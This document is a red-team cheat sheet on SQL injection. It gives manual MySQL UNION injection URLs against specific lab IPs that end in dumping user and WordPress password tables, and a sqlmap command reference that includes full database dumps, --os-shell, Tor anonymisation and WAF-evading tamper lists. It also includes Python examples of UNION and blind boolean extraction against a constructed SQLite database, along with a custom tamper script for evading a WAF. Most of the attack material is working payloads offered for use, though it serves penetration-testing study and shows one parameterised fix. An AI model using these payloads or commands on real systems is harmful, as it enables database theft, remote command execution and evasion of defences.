Red Teaming and Malware Analysis
SQL Injection

Manual tests

The classic MySQL UNION walk: break the query with a quote, find the column count with ORDER BY (the last n that does not error is the count), confirm with a UNION of the same width and note which positions are rendered on the page, then read information_schema and finally the target table. Every UNION line must have exactly as many columns as the ORDER BY probe found (seven here).

 http://10.11.15.137/comment.php?id=756'
 http://10.11.15.137/comment.php?id=756 order by 7
 http://10.11.15.137/comment.php?id=756 union all select 1,2,3,4,5,6,7
 http://10.11.15.137/comment.php?id=756 union all select 1,2,3,4,table_name,6,7 from information_schema.tables
 http://10.11.15.137/comment.php?id=756 union all select 1,2,3,4,column_name,6,7 from information_schema.columns where table_name='users'
 http://10.11.15.137/comment.php?id=756 union all select 1,2,3,4,concat(name,0x3a,password),6,7 FROM users

Same idea against a WordPress forum plugin whose query has a single column; the negative topic id makes the original row disappear so only the injected one is displayed, and spaces are sent as + in the URL:

http://10.11.1.251/wp/wp-content/plugins/wp-forum/feed.php?topic=-4381 union all select 1
http://10.11.1.251/wp/wp-content/plugins/wp-forum/feed.php?topic=-4381+union+select+group_concat(user_login,0x3a,user_pass)+from+wp_users
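The same walk run against a small vulnerable function, as an added example that is not part of the original cheat sheet. It uses an in-memory SQLite database standing in for comment.php (the comments table, the users table and their rows are constructed here), so sqlite_master and pragma_table_info() replace MySQL's information_schema; everything else follows the URLs above, and the parameterised lookup at the end shows why the payloads stop working once the id is bound instead of concatenated:

```python
import sqlite3

# Constructed stand-in for the comment.php backend above: seven columns in the
# comments table (so ORDER BY 7 is the last probe that works) and a users table
# holding the data an attacker is after. SQLite is used so it runs offline; the
# page's payloads target MySQL, so information_schema is replaced by sqlite_master
# and pragma_table_info() below.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE comments (id INTEGER, author TEXT, title TEXT, body TEXT,
                               created TEXT, votes INTEGER, hidden INTEGER);
        INSERT INTO comments VALUES (756, 'alice', 'hello', 'first!', '2020-01-01', 3, 0);
        CREATE TABLE users (id INTEGER, name TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
        INSERT INTO users VALUES (2, 'bob', 'e10adc3949ba59abbe56e057f20f883e');
    """)
    return conn


def vulnerable_lookup(conn, comment_id):
    """What comment.php?id=... does: the raw parameter is glued into the query."""
    sql = "SELECT * FROM comments WHERE id=" + comment_id
    return conn.execute(sql).fetchall()


def safe_lookup(conn, comment_id):
    """The fix: validate the type, then bind the value instead of concatenating it."""
    cid = int(comment_id)          # raises ValueError for '756 order by 7'
    return conn.execute("SELECT * FROM comments WHERE id=?", (cid,)).fetchall()


def find_column_count(conn, base_id, max_cols=20):
    """Step 2 of the manual tests: ORDER BY n errors out as soon as n exceeds
    the number of columns, so the last n that worked is the column count."""
    for n in range(1, max_cols + 1):
        try:
            vulnerable_lookup(conn, f"{base_id} ORDER BY {n}")
        except sqlite3.OperationalError:   # MySQL: "Unknown column 'n' in 'order clause'"
            return n - 1
    return None


def dump_via_union(conn, ncols, position, expr, from_clause):
    """Steps 3-6: UNION a row whose columns are padding numbers except for the one
    position that is rendered on the page, and put the wanted expression there.
    A negative id (as in the wp-forum example) keeps the real row out of the output."""
    cols = ["1"] * ncols
    cols[position - 1] = expr
    payload = f"-1 UNION ALL SELECT {','.join(cols)} {from_clause}"
    return [row[position - 1] for row in vulnerable_lookup(conn, payload)]


if __name__ == "__main__":
    db = build_db()
    n = find_column_count(db, "756")
    print("columns:", n)
    print("tables:", dump_via_union(db, n, 5, "name", "FROM sqlite_master WHERE type='table'"))
    print("users columns:", dump_via_union(db, n, 5, "name", "FROM pragma_table_info('users')"))
    print("creds:", dump_via_union(db, n, 5, "name || ':' || password", "FROM users"))
    try:
        safe_lookup(db, "756 ORDER BY 7")
    except ValueError as e:
        print("parameterised lookup rejected the payload:", e)
```

The position argument is the column you saw rendered in step 3; on a real page only some of the seven come back, and the one that shows the marker is where the expression goes.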

SQLmap 101

Simple Usage

If you know nothing about the target yet, run the plain command first and read what sqlmap reports (injectable parameter, DBMS, technique). A URL with no parameters gives sqlmap nothing to test; add --forms to test the forms on that page, or --crawl=2 to have it discover links first.

sqlmap -u "https://target_site.com/page/"

Automatic GET request parameter

Every parameter in the query string is tested in turn:

sqlmap -u "https://target_site.com/page?p1=value1&p2=value2"

Specify the GET request parameters to Exploit

Restrict testing or exploitation to one parameter with -p:

sqlmap -u "https://target_site.com/page?p1=value1&p2=value2" -p p1

Use POST requests (Test All parameters)

sqlmap -u “https://target_site.com/page/” --data="p1=value1&p2=value2"

SQLMap Request file as input

You can feed sqlmap a file containing the raw HTTP request (in Burp Suite: right-click the request, "Copy to file"); method, headers, cookies and body are all taken from it.

sqlmap -r request.txt

Add -p to restrict testing to one parameter; otherwise sqlmap tests every parameter it recognises in the request.

Specify Custom Position in HTTP request file

Put an asterisk (*) right after the value you want injected, anywhere in the request file (URL path, query string, a header or the body), and sqlmap treats that spot as the injection point instead of guessing parameters.

Use Authenticated Session With Cookie

--cookie takes the header value as the browser sends it, i.e. name=value pairs separated by "; ":

sqlmap -u "https://target_site.com/page/" --data="p1=value1&p2=value2" --cookie="PHPSESSID=<session_cookie_value>"

Use Authenticated Session with Auth Headers

Any extra header can be added with --headers (separate several with \n); a bearer token goes in the same way:

sqlmap -u "https://target_site.com/page/" --data="p1=value1&p2=value2" --headers="Authorization: Basic YWxhZGRpbjpvcGVuc2VzYW1l"

Basic Authentication

sqlmap -u "https://target_site.com/page/" --data="p1=value1&p2=value2" --auth-type=basic --auth-cred=username:password

--auth-type also accepts digest and ntlm. With -r the cookie and auth headers are already in the request file, so none of these options are needed there.

Use Previously created Session as SQLmap input (-s)

Once an injection is confirmed, sqlmap stores everything it learned (injection point, technique, DBMS, fetched data) in a session file (session.sqlite) under its output directory, by default ~/.local/share/sqlmap/output/<host>/ (older versions: ~/.sqlmap/output/). Later commands against the same target load it with -s and skip the whole detection phase:

sqlmap -u "https://target_site.com/page?p1=value1" -s SESSION-FILE.sqlite --dbs

Running the same -u again without -s also resumes from that directory automatically; -s is for a session file you moved or copied from another machine. --flush-session discards it and starts detection over.

Post Exploitation Commands

Once sqlmap has confirmed an injectable parameter, the same command with one of the following options enumerates and extracts data. --dump over a blind technique costs several requests per character, so narrow it with -D/-T/-C.

List the Databases

sqlmap -u "https://target_site.com/page?p1=value1" --dbs

List Tables of Database TARGET_DB

sqlmap -u "https://target_site.com/page?p1=value1" -D TARGET_DB --tables

List Columns of Table TARGET_TABLE of Database TARGET_DB

sqlmap -u "https://target_site.com/page?p1=value1" -D TARGET_DB -T TARGET_TABLE --columns

Dump Specific Data of Columns of Table TARGET_TABLE of Database TARGET_DB

sqlmap -u "https://target_site.com/page?p1=value1" -D TARGET_DB -T TARGET_TABLE -C "Col1,Col2" --dump

Fully Dump Table TARGET_TABLE of Database TARGET_DB

sqlmap -u "https://target_site.com/page?p1=value1" -D TARGET_DB -T TARGET_TABLE --dump

Dump full Database

sqlmap -u "https://target_site.com/page?p1=value1" -D TARGET_DB --dump

Custom SQL query

The query must name a table, not just the database:

sqlmap -u "https://target_site.com/page?p1=value1" --sql-query="SELECT name,password FROM TARGET_DB.TARGET_TABLE"

Get OS Shell

--os-shell needs a DBMS and account that can write files or run commands (e.g. MySQL FILE privilege plus a writable web root, or xp_cmdshell on MSSQL); sqlmap prompts for the web server language and a writable path:

sqlmap -u "https://target_site.com/page?p1=value1" --os-shell

Get SQL shell

--sql-shell gives an interactive SQL prompt over the injection (--sqlmap-shell, by contrast, is an interactive prompt for sqlmap's own options):

sqlmap -u "https://target_site.com/page?p1=value1" --sql-shell

SQLMap Proxy

Proxy through Burpsuite

Routing sqlmap through Burp shows exactly which payloads it sends and lets you replay them by hand:

sqlmap -u "https://target_site.com/page?p1=value1" --proxy="http://127.0.0.1:8080/"

Use Tor Socks5 proxy

--check-tor verifies that requests really leave through Tor before testing starts:

sqlmap -u "https://target_site.com/page?p1=value1" --tor --tor-type=SOCKS5 --check-tor --dbs

Extra

Specify The Database Type

Naming the back-end up front skips fingerprinting and limits payloads to that DBMS:

sqlmap -u "https://target_site.com/page?p1=value1" --dbms=mysql

Supported values include MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, Informix, MariaDB, Percona, MemSQL, TiDB, CockroachDB, HSQLDB, H2, MonetDB, Apache Derby, Amazon Redshift, Vertica, Mckoi, Presto, Altibase, MimerSQL, CrateDB, Greenplum, Drizzle, Apache Ignite, Cubrid, InterSystems Cache, IRIS, eXtremeDB, FrontBase and others.

Attack Techniques

--technique takes one or more of the letters BEUSTQ and restricts sqlmap to those techniques (default: all of them). Fewer techniques means a faster, quieter run; for example --technique=U when the manual tests above already proved the UNION path.

  • B: Boolean-based blind (page content differs for true and false conditions)

  • E: Error-based (DBMS error messages leak query results)

  • U: Union query-based (results appear in the page through UNION SELECT)

  • S: Stacked queries (a second statement after ";", needs DBMS and driver support)

  • T: Time-based blind (a delay such as SLEEP() reveals true or false)

  • Q: Inline queries (a sub-select embedded in the original query)

sqlmap -u "https://target_site.com/page?p1=value1" --technique=BEUSTQ
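What technique B does under the hood, as an added example rather than code from the page or from sqlmap: a constructed in-memory SQLite "page" that only reveals whether a comment exists, and a bisection extractor that recovers the admin hash with about seven requests per character instead of one per candidate (SQLite's unicode()/substr() stand in for MySQL's ascii()/substring()):

```python
import sqlite3

# Constructed stand-in for a page that only reveals whether the comment exists
# (no error text, no reflected columns), which is where technique B applies.
_conn = sqlite3.connect(":memory:")
_conn.executescript("""
    CREATE TABLE comments (id INTEGER, body TEXT);
    INSERT INTO comments VALUES (756, 'first!');
    CREATE TABLE users (name TEXT, password TEXT);
    INSERT INTO users VALUES ('admin', '5f4dcc3b5aa765d61d8327deb882cf99');
""")


def page_shows_comment(comment_id):
    """Vulnerable oracle: raw concatenation again, but the only observable is
    whether the page renders a comment (row found) or not."""
    sql = "SELECT body FROM comments WHERE id=" + comment_id
    return _conn.execute(sql).fetchone() is not None


class CountingOracle:
    """Wraps the oracle so the number of 'requests' can be reported."""

    def __init__(self, fn):
        self.fn, self.requests = fn, 0

    def __call__(self, payload):
        self.requests += 1
        return self.fn(payload)


def ask(oracle, condition):
    # Append a condition to a valid id: the row comes back only if it is true.
    return oracle(f"756 AND ({condition})")


def blind_length(oracle, subquery, max_len=256):
    """Binary-search the length of the sub-select's result."""
    lo, hi = 0, max_len
    while lo < hi:
        mid = (lo + hi) // 2
        if ask(oracle, f"length(({subquery})) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def blind_char(oracle, subquery, pos):
    """Binary-search one character's code point over printable ASCII.
    SQLite: unicode(substr(x, pos, 1)); MySQL: ascii(substring(x, pos, 1))."""
    lo, hi = 32, 126
    while lo < hi:
        mid = (lo + hi) // 2
        if ask(oracle, f"unicode(substr(({subquery}),{pos},1)) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return chr(lo)


def blind_extract(oracle, subquery):
    """Length first, then every character; each step is one true/false request."""
    n = blind_length(oracle, subquery)
    return "".join(blind_char(oracle, subquery, i) for i in range(1, n + 1))


if __name__ == "__main__":
    o = CountingOracle(page_shows_comment)
    secret = blind_extract(o, "SELECT password FROM users WHERE name='admin'")
    print(f"admin hash: {secret} ({o.requests} requests)")
```

This is why blind dumps are slow and noisy: a 32-character hash costs over two hundred requests, each of which lands in the web server log with the condition in the query string.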

Test level and risk

Two flags control how many payloads and injection points sqlmap tries:

  1. --level=LEVEL Level of tests to perform (1-5, default 1)

  2. --risk=RISK Risk of tests to perform (1-3, default 1)

sqlmap -u "https://target_site.com/page?p1=value1" --risk=3 --level=5

Option: --risk

--risk=1: default; the tests that are safe for the majority of injection points.

--risk=2: adds heavy-query time-based tests (these load the database server).

--risk=3: adds OR-based tests. Take care: an OR-based payload that lands in an UPDATE or DELETE statement can modify or wipe every row in the table, so do not use risk 3 against data you cannot restore.

Option: --level

Higher levels add payloads and injection points: level >= 2 also tests HTTP Cookie header values, level >= 3 also tests the HTTP User-Agent and Referer headers. Level 5 with risk 3 is the exhaustive run, and also the slowest and noisiest.

Use Default Options for the process

--batch answers every interactive prompt with its default (the capital letter in [Y/n]), so sqlmap runs unattended in scripts and long jobs. Read the prompts once on a manual run so you know what those defaults commit you to.

sqlmap -u "https://target_site.com/page?p1=value1" --batch

--force-ssl flag

Forces sqlmap to use HTTPS for its requests even when the URL or request file says http; the usual case is -r, because a request copied from Burp carries no scheme and sqlmap then defaults to plain HTTP. If a run fails with "can't establish SSL connection", retry with:

sqlmap -r request.txt --force-ssl

Tamper Scripts

Tamper scripts rewrite each payload just before it is sent, to get past a WAF or to match whatever transformation the application expects. Several can be chained in one --tamper flag; sqlmap applies them ordered by each script's __priority__, not by their order on the command line. --list-tampers prints the ones shipped with sqlmap.

sqlmap -u "https://target_site.com/page?p1=value1" --tamper=charencode

General purpose:

--tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes

MSSQL:

--tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes

MySQL:

--tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor

These lists are shotgun combinations; stacking encoders (base64encode on top of charencode, for instance) usually breaks the payload for the target, so start with the one or two that match the filter you observed and add more only if needed. Where the application encrypts, encodes, hashes or signs the parameter before it reaches the database (AES, DES, base64, a custom HMAC) none of the stock scripts fit, and you write your own: a Python file exposing a tamper(payload, **kwargs) function that returns the transformed payload.
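A minimal custom tamper script, added here as an example (not one of sqlmap's bundled scripts). It assumes a hypothetical target that base64-decodes the parameter before building its query and sits behind a WAF that blocks spaces; the X-Forwarded-For header and the 127.0.0.1 value are likewise assumed. Save it as b64space2comment.py under sqlmap's tamper/ directory (or pass the file path) and run with --tamper=b64space2comment:

```python
"""Custom sqlmap tamper (example): /**/ instead of spaces, then base64.

Assumed target: a parameter the application base64-decodes before using it in
SQL, behind a WAF that blocks plain spaces. Loaded by sqlmap via --tamper.
"""
import base64

try:
    from lib.core.enums import PRIORITY   # available when sqlmap loads the script
    __priority__ = PRIORITY.NORMAL
except ImportError:                       # running outside sqlmap, e.g. a local test
    __priority__ = 0


def dependencies():
    """sqlmap calls this once at startup; nothing extra is required here."""
    pass


def evade_waf(payload):
    """Replace every space with an inline comment, the same idea as space2comment."""
    return payload.replace(" ", "/**/")


def tamper(payload, **kwargs):
    """Entry point sqlmap calls for every payload it is about to send.

    kwargs carries the request 'headers' dict, which may be modified in place
    (the bundled xforwardedfor script uses the same hook). The header and the
    127.0.0.1 value are assumptions for this example, not something the target
    is known to honour.
    """
    if not payload:
        return payload
    headers = kwargs.get("headers", {})
    headers["X-Forwarded-For"] = "127.0.0.1"
    return base64.b64encode(evade_waf(payload).encode()).decode()


def decode_as_server_would(value):
    """Reverse transform, reproducing the assumed server-side base64 decode;
    useful for checking locally that the payload survives the round trip."""
    return base64.b64decode(value).decode()
```

sqlmap still URL-encodes the returned string unless --skip-urlencode is given, so the + and / characters of base64 survive the query string; if the application expects URL-safe base64 instead, swap in base64.urlsafe_b64encode.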

Resources

  • kleiton0x00/Advanced-SQL-Injection-Cheatsheet (GitHub): advanced queries for SQL injection of all types
  • SQLMap Cheat Sheet: The Lazy Man's Guide (The Dark Source)
  • Full SQL Injection Tutorial (MySQL) (Exploit Database)
  • NetSPI SQL Injection Wiki (NetSPI)